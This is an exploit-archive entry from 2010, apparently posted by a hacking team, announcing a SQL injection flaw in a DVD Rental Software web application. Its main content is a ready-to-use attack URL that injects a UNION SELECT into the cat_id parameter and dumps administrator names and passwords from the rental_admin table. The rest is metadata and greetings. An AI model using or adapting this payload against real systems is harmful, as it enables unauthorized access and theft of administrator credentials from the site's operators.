[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DVD Rental Software SQL injection Vulnerability
# Published : 2010-11-19
# Author : JaMbA
# Previous Title : Front Accounting 2.3RC2 Multiple SQL Injection Vulnerabilities
# Next Title : Front Accounting 2.3RC2 Multiple Persistent XSS Vulnerabilities
# Exploit Title: DVD Rental Software SQL injection Vulnerability
# Date: 19/11/2010
# Author: JaMbA
# Team: SwT
#Script url: http://www.commodityrentals.com/dvd.php
# Version: N/A
# Tested on: Demo
# CVE : ()
###################################################################################
#########################[ EXPL0!T ]#########################
http://server/path/index.php?view=catalog&item_type=M&cat_id=-18+union+select+1,2,concat(admin_name,0x3a,admin_password),4,5+from+rental_admin--
#############################SwT 4
Ever##############################################
GreeTz: SwT Member - ZaTTalova - Med Amine SaSsi - Raouf Matmati - Rami Bof
- Mr adnen smii - Mr zied becher
Dj Dj City Up Up :)